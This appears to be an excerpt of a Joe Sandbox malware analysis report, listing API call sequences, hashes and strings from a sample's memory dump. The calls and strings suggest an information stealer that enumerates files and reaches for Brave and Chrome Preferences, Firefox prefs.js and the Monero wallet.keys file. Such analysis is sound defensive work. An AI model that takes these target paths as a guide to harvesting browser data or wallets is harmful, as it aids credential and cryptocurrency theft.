                                         • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$Process$AllocateName$ComputerExitUser
                                        • String ID:
                                        • API String ID: 3550813701-0
                                        • Opcode ID: 67498fee6314f4163471b1b7f2bfbb0aa1b5c86308d679414d2ef61ca7b39fb7
                                        • Instruction ID: 76662ba0645585471d80407e0367c7eab48268999fc079d928f6c79ef4e4af51
                                        • Opcode Fuzzy Hash: 67498fee6314f4163471b1b7f2bfbb0aa1b5c86308d679414d2ef61ca7b39fb7
                                        • Instruction Fuzzy Hash: 7FE017B5E1831563CA0073F0BC8BB2B769C5B9434AF040968FA09E3206FE25E800866A
                                        APIs
                                        • wsprintfA.USER32 ref: 009238CC
                                        • FindFirstFileA.KERNEL32(?,?), ref: 009238E3
                                        • lstrcat.KERNEL32(?,?), ref: 00923935
                                        • StrCmpCA.SHLWAPI(?,00930F70), ref: 00923947
                                        • StrCmpCA.SHLWAPI(?,00930F74), ref: 0092395D
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00923C67
                                        • FindClose.KERNEL32(000000FF), ref: 00923C7C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                         • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                        • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                        • API String ID: 1125553467-2524465048
                                        • Opcode ID: 1d515db515a7bcd3cfc749b8a5f9027f8fecf62466b91702808d048afe4bc61c
                                        • Instruction ID: 4b864ea7f1702756f7f2e293ba68d620f14d661fbca05505186f1f56e0c6a62c
                                        • Opcode Fuzzy Hash: 1d515db515a7bcd3cfc749b8a5f9027f8fecf62466b91702808d048afe4bc61c
                                        • Instruction Fuzzy Hash: 9BA121B1A003189BDB24DF64DC85FEE737DBB88301F048698A64DA7145EB759B84CF62
                                        APIs
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                          • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                                          • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                                          • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                                          • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                                          • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                        • FindFirstFileA.KERNEL32(00000000,?,00930B32,00930B2B,00000000,?,?,?,009313F4,00930B2A), ref: 0091BEF5
                                        • StrCmpCA.SHLWAPI(?,009313F8), ref: 0091BF4D
                                        • StrCmpCA.SHLWAPI(?,009313FC), ref: 0091BF63
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0091C7BF
                                        • FindClose.KERNEL32(000000FF), ref: 0091C7D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                         • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                        • API String ID: 3334442632-726946144
                                        • Opcode ID: 28e380b7bd50053589896b4e4e0bf36b3e4fbdc9c3124a251a88c4a7955e4c46
                                        • Instruction ID: 9529a517fb7514f4852e30b769f26bf1bef15e88a53b73eaa15345b6462fe061
                                        • Opcode Fuzzy Hash: 28e380b7bd50053589896b4e4e0bf36b3e4fbdc9c3124a251a88c4a7955e4c46
                                        • Instruction Fuzzy Hash: 58424272A10118ABCB14FB60EC96FED737DAFD8300F404558F50AA7195EE349B49CB96
                                        APIs
                                        • wsprintfA.USER32 ref: 0092492C
                                        • FindFirstFileA.KERNEL32(?,?), ref: 00924943
                                        • StrCmpCA.SHLWAPI(?,00930FDC), ref: 00924971
                                        • StrCmpCA.SHLWAPI(?,00930FE0), ref: 00924987
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00924B7D
                                        • FindClose.KERNEL32(000000FF), ref: 00924B92
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                         • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\%s$%s\%s$%s\*
                                        • API String ID: 180737720-445461498
                                        • Opcode ID: 95dfc1c80d163005b443f1450b06d93dbbf193f2d012b5cc399c11bf1510edd6
                                        • Instruction ID: d90b965799f7d59c1564475fbe87061bf34d4e2fa39d2c6a14e9702d85a60763
                                        • Opcode Fuzzy Hash: 95dfc1c80d163005b443f1450b06d93dbbf193f2d012b5cc399c11bf1510edd6
                                        • Instruction Fuzzy Hash: 93612771500218ABCB24EBA0EC55FEE777CBB88701F0446D8B609A6145EF75EB85CF91
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00924580
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00924587
                                        • wsprintfA.USER32 ref: 009245A6
                                        • FindFirstFileA.KERNEL32(?,?), ref: 009245BD
                                        • StrCmpCA.SHLWAPI(?,00930FC4), ref: 009245EB
                                        • StrCmpCA.SHLWAPI(?,00930FC8), ref: 00924601
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0092468B
                                        • FindClose.KERNEL32(000000FF), ref: 009246A0
                                        • lstrcat.KERNEL32(?,006BEAD8), ref: 009246C5
                                        • lstrcat.KERNEL32(?,006BDCA0), ref: 009246D8
                                        • lstrlen.KERNEL32(?), ref: 009246E5
                                        • lstrlen.KERNEL32(?), ref: 009246F6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                         • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                        • String ID: %s\%s$%s\*
                                        • API String ID: 671575355-2848263008
                                        • Opcode ID: 9711be7e02bba9ee5e8ba54a389329f89d899907eb8406bf8277f68ef8c0a332
                                        • Instruction ID: bab89844420c2c48b9097e782125e2adf17d65bb39f232b0782ab0cb14f524ae
                                        • Opcode Fuzzy Hash: 9711be7e02bba9ee5e8ba54a389329f89d899907eb8406bf8277f68ef8c0a332
                                        • Instruction Fuzzy Hash: 215145B5500218ABC764EB70DC89FED737CAB98701F4046C8F609A7194EF759B848F92
                                        APIs
                                        • wsprintfA.USER32 ref: 00923EC3
                                        • FindFirstFileA.KERNEL32(?,?), ref: 00923EDA
                                        • StrCmpCA.SHLWAPI(?,00930FAC), ref: 00923F08
                                        • StrCmpCA.SHLWAPI(?,00930FB0), ref: 00923F1E
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0092406C
                                        • FindClose.KERNEL32(000000FF), ref: 00924081
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                         • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\%s$hk
                                        • API String ID: 180737720-2267562958
                                        • Opcode ID: 5adc2499788fa965fc28ffd11a8cf09808c88efe04a04f8510e059514d4058f5
                                        • Instruction ID: ee108d88a1ae6b44f1647c096388b9f9723aa9c38258b81054f953efd39fb677
                                        • Opcode Fuzzy Hash: 5adc2499788fa965fc28ffd11a8cf09808c88efe04a04f8510e059514d4058f5
                                        • Instruction Fuzzy Hash: FB5127B6900218ABCB24EBB0DC85FEE777CBB84301F4046C8B65997144DF75AB858F55
                                        APIs
                                        • wsprintfA.USER32 ref: 0091ED3E
                                        • FindFirstFileA.KERNEL32(?,?), ref: 0091ED55
                                        • StrCmpCA.SHLWAPI(?,00931538), ref: 0091EDAB
                                        • StrCmpCA.SHLWAPI(?,0093153C), ref: 0091EDC1
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0091F2AE
                                        • FindClose.KERNEL32(000000FF), ref: 0091F2C3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\*.*
                                        • API String ID: 180737720-1013718255
                                        • Opcode ID: 284cc798b022ac84678393e351e313011fbcce6aedfe17be79cae5ea62913839
                                        • Instruction ID: 8248ea1231aed4d6196efab5492bfeade24a13947649b7e75253572a90e47509
                                        • Opcode Fuzzy Hash: 284cc798b022ac84678393e351e313011fbcce6aedfe17be79cae5ea62913839
                                        • Instruction Fuzzy Hash: CBE1AD769111289BEB55FB60EC52FEE733CAF94300F404599F50A62096EE306F8ACF56
                                        APIs
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                          • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                                          • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                                          • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                                          • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                                          • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009315B8,00930D96), ref: 0091F71E
                                        • StrCmpCA.SHLWAPI(?,009315BC), ref: 0091F76F
                                        • StrCmpCA.SHLWAPI(?,009315C0), ref: 0091F785
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0091FAB1
                                        • FindClose.KERNEL32(000000FF), ref: 0091FAC3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID: prefs.js
                                        • API String ID: 3334442632-3783873740
                                        • Opcode ID: 14101b972600d3730555da27afdbbc500ac4df77f16fc1b158dd879a504a1bcb
                                        • Instruction ID: 32fa09c4ca2af7fb5d1592b08aaddd1a455d316bdb7b60124372662fca917c7c
                                        • Opcode Fuzzy Hash: 14101b972600d3730555da27afdbbc500ac4df77f16fc1b158dd879a504a1bcb
                                        • Instruction Fuzzy Hash: 7BB11672A001189BDB24FF60EC96BED7379AFD4300F4085A8E50A97195EF345B49CF96
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID: )O$#Qw{$#uKz$$}o$)uyw$Hg[_$NFNr$]v$p)?${vf$iX
                                        • API String ID: 0-1104099592
                                        • Opcode ID: 090768117266bf5e91e9df0cbe0740cfa4d0cbeda4d6c6d241229b8e59cfc794
                                        • Instruction ID: 22c60bb55f792dfbc8c75e8459b9f028464e6b94eaa411ad917ad88cf2a24b3c
                                        • Opcode Fuzzy Hash: 090768117266bf5e91e9df0cbe0740cfa4d0cbeda4d6c6d241229b8e59cfc794
                                        • Instruction Fuzzy Hash: C1B22AF360C204AFE304AE2DEC8567AFBE9EF94720F16853DE6C4C7744EA7558058692
                                        APIs
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0093510C,?,?,?,009351B4,?,?,00000000,?,00000000), ref: 00911923
                                        • StrCmpCA.SHLWAPI(?,0093525C), ref: 00911973
                                        • StrCmpCA.SHLWAPI(?,00935304), ref: 00911989
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00911D40
                                        • DeleteFileA.KERNEL32(00000000), ref: 00911DCA
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00911E20
                                        • FindClose.KERNEL32(000000FF), ref: 00911E32
                                          • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                                          • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                                          • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                                          • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                                          • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        Similarity
                                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                        • String ID: \*.*
                                        • API String ID: 1415058207-1173974218
                                        • Opcode ID: cb70c4dc669b1592c97bc59da2cf3d21be929cac42756652d2c029a8d9f67ce4
                                        • Instruction ID: 5670f4f5190b1fa7a48d5b19c578197d06b7c33ecf65bbc4d69117e48106e818
                                        • Opcode Fuzzy Hash: cb70c4dc669b1592c97bc59da2cf3d21be929cac42756652d2c029a8d9f67ce4
                                        • Instruction Fuzzy Hash: 0212E072911128ABDB19FB60EC96FEE7378AF94300F404599F50A62095EF306F89CF95
                                        APIs
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                          • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                                          • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                                          • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00930C2E), ref: 0091DE5E
                                        • StrCmpCA.SHLWAPI(?,009314C8), ref: 0091DEAE
                                        • StrCmpCA.SHLWAPI(?,009314CC), ref: 0091DEC4
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0091E3E0
                                        • FindClose.KERNEL32(000000FF), ref: 0091E3F2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        Similarity
                                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                        • String ID: \*.*
                                        • API String ID: 2325840235-1173974218
                                        • Opcode ID: 8e0b0c889ef4f646b6d353ded3c02b1bc380e3e98296a8c5d69d41fc817d0a93
                                        • Instruction ID: ba4c98e8c997f210e7124965bd3c756d83015d5315908e333248bf131f716f8b
                                        • Opcode Fuzzy Hash: 8e0b0c889ef4f646b6d353ded3c02b1bc380e3e98296a8c5d69d41fc817d0a93
                                        • Instruction Fuzzy Hash: 44F18E729151289BDB15EB60EC95BEE7338BF98300F4045D9E41A62095EF306F8ACF65
                                        APIs
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                          • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                                          • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                                          • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                                          • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                                          • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009314B0,00930C2A), ref: 0091DAEB
                                        • StrCmpCA.SHLWAPI(?,009314B4), ref: 0091DB33
                                        • StrCmpCA.SHLWAPI(?,009314B8), ref: 0091DB49
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0091DDCC
                                        • FindClose.KERNEL32(000000FF), ref: 0091DDDE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID:
                                        • API String ID: 3334442632-0
                                        • Opcode ID: 4f3401cf64b624c2b6ab98b81b5fbd11350560e227890ac30b75f3183d07da2b
                                        • Instruction ID: 57f5640c1af0da16150a8f3fc3a4edf0555256e8876c92bc0c2554332dbad02a
                                        • Opcode Fuzzy Hash: 4f3401cf64b624c2b6ab98b81b5fbd11350560e227890ac30b75f3183d07da2b
                                        • Instruction Fuzzy Hash: D6910573A00118ABCB14FB70FC56BED737DABC8300F408658F94A96195EE349B59CB96
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        Similarity
                                        • API ID:
                                        • String ID: {_$~yy$+yw:$O!?9$O!?9$b/R>$hWw$Av}$Z'
                                        • API String ID: 0-1268780608
                                        • Opcode ID: 1c1035093f43de916cb0e83d493f7eafa0e682afffe3571a113198cef50db339
                                        • Instruction ID: 983210e223e71582d4f70103522864625c2209c25ddfb1f4dbd3d30cde54c02d
                                        • Opcode Fuzzy Hash: 1c1035093f43de916cb0e83d493f7eafa0e682afffe3571a113198cef50db339
                                        • Instruction Fuzzy Hash: 70B207F390C2049FE3046E2DEC8577ABBE9EF94720F1A863DEAC4C7744E63558058696
                                        APIs
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                        • GetKeyboardLayoutList.USER32(00000000,00000000,009305AF), ref: 00927BE1
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00927BF9
                                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 00927C0D
                                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00927C62
                                        • LocalFree.KERNEL32(00000000), ref: 00927D22
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                         • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                        • String ID: /
                                        • API String ID: 3090951853-4001269591
